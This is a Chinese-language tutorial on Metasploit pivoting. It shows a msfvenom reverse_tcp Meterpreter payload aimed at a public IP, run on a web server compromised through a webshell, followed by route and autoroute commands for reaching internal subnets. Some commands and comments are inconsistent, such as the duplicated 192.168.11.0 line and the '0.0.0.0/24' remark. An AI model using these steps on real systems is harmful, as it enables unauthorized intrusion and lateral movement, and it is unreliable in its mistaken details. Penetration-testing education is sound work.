目錄
反彈MSF類型的Shell
添加內網路由
MSF的跳板功能是MSF框架中自帶的一個路由轉發功能,其實現過程就是MSF框架在已經獲取的Meterpreter Shell的基礎上添加一條去往“內網”的路由,直接使用MSF去訪問原本不能直接訪問的內網資源,只要路由可達了那么我們使用MSF來進行探測了。
我們現在有下面這個環境:
Web服務器通過端口映射,對外提供Web服務。Web服務器上有兩張網卡,內網分別還有其他兩台服務器,一台開放了http服務,一台開放了SMB服務。拓撲圖如下:
反彈MSF類型的Shell
我們通過web滲透,成功往Web服務器上上傳了一句話木馬,成功用菜刀連接。
然后我們現在想獲得一個MSF類型的Shell。
我們先生成一個木馬文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=112.74.89.58 lport=42906 -f exe -o test.exe
用菜刀上傳到Web服務器上,然后執行我們的木馬程序,Kali成功獲得反彈的MSF類型的shell。
添加內網路由
然后我們現在想要繼續滲透內網。
我們先獲取目標內網相關信息,可以看到該主機上的網卡有兩個網段。
run get_local_subnets
如果我們不添加這兩個網段路由的話,是探測不到這兩個網段其他主機的。
以下是手動添加到達192.168.11.0和192.168.12.0的路由
1 #在全局給指定的session加 2 route add 192.168.11.0 255.255.255.0 1 #在session1中添加到達192.168.11.0網段的路由 3 route add 192.168.12.0 255.255.255.0 1 #在session1中添加到達192.168.12.0網段的路由 4 route add 0.0.0.0 0.0.0.0 1 #在session1中添加到達0.0.0.0/24網段的路由 5 route del 192.168.12.0 255.255.255.0 2 #在session2中刪除到達192.168.12.0網段的路由 6 route print #打印路由信息 7 8 #也可以在進入session下添加路由 9 run autoroute -s 192.168.11.0/24 #添加到達192.168.11.0網段的路由 10 run autoroute -s 192.168.11.0/24 #添加到達192.168.12.0網段的路由 11 run autoroute -p #打印路由信息
以下是添加路由前后探測的對比信息。
注意:在實際的內網滲透中,我們可以直接添加到 0.0.0.0/24的路由,這樣,只要該被控主機可達的地址就都可達!